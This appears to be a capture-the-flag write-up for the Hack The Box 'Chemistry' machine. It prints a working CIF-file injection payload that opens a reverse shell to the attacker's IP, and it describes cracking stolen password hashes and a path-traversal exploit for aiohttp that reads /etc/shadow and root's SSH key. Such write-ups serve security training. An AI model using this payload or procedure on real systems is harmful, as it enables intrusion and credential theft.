# HTB | Chemistry
This is a Linux box. You can find it [here](https://app.hackthebox.com/machines/Chemistry).
**Skill Learned**
* CIF exploit
* CVE-2024-23334
## NMAP
IP:10.129.30.124
```
nmap -sT -p- --min-rate 10000 10.129.30.124
```
nmap
### Port 5000
port 5000
on registering we have a file upload option with .cif to to upload.
We can download an `example.cif` to look at the syntax
## Foothold/shell
### CIF Exploit
example.cif
It is a CIF (Crystallographic Information File) format, which is commonly used in crystallography to describe the atomic structure of crystals. Here’s a breakdown of the data:
1. **Cell Parameters**:
These describe the dimensions of the unit cell (the repeating structure in the crystal lattice):
* **\_cell\_length\_a**: The length of the unit cell along the "a" axis (10.00000 Å).
* **\_cell\_length\_b**: The length of the unit cell along the "b" axis (10.00000 Å).
* **\_cell\_length\_c**: The length of the unit cell along the "c" axis (10.00000 Å).
* **\_cell\_angle\_alpha**: The angle between the "b" and "c" axes (90.00000 degrees).
* **\_cell\_angle\_beta**: The angle between the "a" and "c" axes (90.00000 degrees).
* **\_cell\_angle\_gamma**: The angle between the "a" and "b" axes (90.00000 degrees).
These parameters indicate that the unit cell is cubic (since all angles are 90 degrees and the lengths are equal).
2. **Symmetry Information**:
* **\_symmetry\_space\_group\_name\_H-M 'P 1'**: This specifies the space group of the crystal. 'P 1' indicates the simplest space group, with no symmetry beyond translational symmetry. It is the most basic space group in crystallography, implying there are no additional symmetry operations like rotations or reflections.
3. **Atomic Positions**:\
The loop section defines the positions of atoms within the unit cell. The fractional coordinates (\_fract\_x, \_fract\_y, \_fract\_z) specify the position of each atom relative to the dimensions of the unit cell:
* **H (Hydrogen)**:
* Coordinates: (0.00000, 0.00000, 0.00000) — at the origin of the unit cell.
* Occupancy: 1 (fully occupied).
* **O (Oxygen)**:
* Coordinates: (0.50000, 0.50000, 0.50000) — at the centre of the unit cell.
* Occupancy: 1 (fully occupied).
**Overall Explanation**: This CIF file describes a crystal with a simple cubic unit cell, where a hydrogen atom is located at the origin and an oxygen atom is located at the centre of the unit cell. The space group "P 1" implies no symmetry beyond basic translation, meaning there are no mirror planes, rotations, or inversions in the crystal structure.
#### Payload
On googling the payload I found [this](https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f) GitHub repo. After some hit and trail, I found the reverse shell
edit example.cif and add the below lines
```
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c 'sh -i >& /dev/tcp/10.10.14.46/1234 0>&1'");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
```
the above payload that is not part of standard crystallographic data but is instead a Python-based shell command injection. Here's what's happening in this command:
**Breakdown**:
* **\_space\_group\_magn.transform\_BNS\_Pp\_abc**: This CIF tag seems to be altered for malicious purposes. Instead of normal crystallographic information, it contains Python code hidden within a data field.
* **The Code**:
* The code looks for a specific class (BuiltinImporter) using Python's introspection capabilities.
* It then calls `os.system` to execute a shell command that opens a reverse shell connection to IP 10.10.14.46 on port 1234. The command `sh -i >& /dev/tcp/10.10.14.46/1234 0>&1` is designed to establish a reverse shell (giving remote access to the system) to the specified IP and port.
* **Reverse Shell**: If executed successfully, this command will attempt to open a reverse shell, which means the machine processing the CIF file will try to connect back to the attacker's machine at 10.10.14.46 on port 1234. This would provide the attacker with remote control over the machine running the CIF file.
\
Upload the file and click on View also before clicking view start the nc listener
nc -nlvp 1234
We found user.txt but we do not have permission to view
On looking around the server we found a database.db file
database.db
On further analysing the databse.db we found passwords for users.
passwords
Found the password for Rosa via [crackstation](https://crackstation.net/)
crackstation
Now we can view the **user.txt**
user.txt
## Priv Esc
For further enumeration, we will copy linpeas to the box.
and now we will run it
We found that there is some internal service running on port 8080
8080
let's do port forwarding of port 8080 to our 8888 So that we can access it via localhost
```
ssh -L 8888:localhost:8080 rosa@10.129.30.146
```
port forward
On using nmap on localhost 8888, we found **aiohttp 3.9.1** is running on port 8080 internally
nmap
### CVE 2024-23334
On googling about **aiohttp 3.9.1** exploit we found [this](https://github.com/z3rObyte/CVE-2024-23334-PoC) GitHub repo for POC
exploit.sh
Let's copy this exploit to the box and run it
Looks like we have to modify the script
After making necessary changes to the script Now when we run it we can get /etc/passwd
/etc/password
We can verify if we can cat /etc/shadow or not, this will confirm whether we can view files with root permission or not, we have to replace `etc/passwd` to `etc/shadow` in the script and run
/etc/shadow
And now we are sure that the exploit works properly we can get root.txt
Now there are two methods
#### Method 1
We can directly cat **root.txt.** For this, we have to change `/etc/shadow` to `root/root.txt`
and run the script
root.txt
#### Method 2
We can get the id\_rsa for root and ssh as root
Now when we run it we will have root's RSA key
copy the key and ssh as root
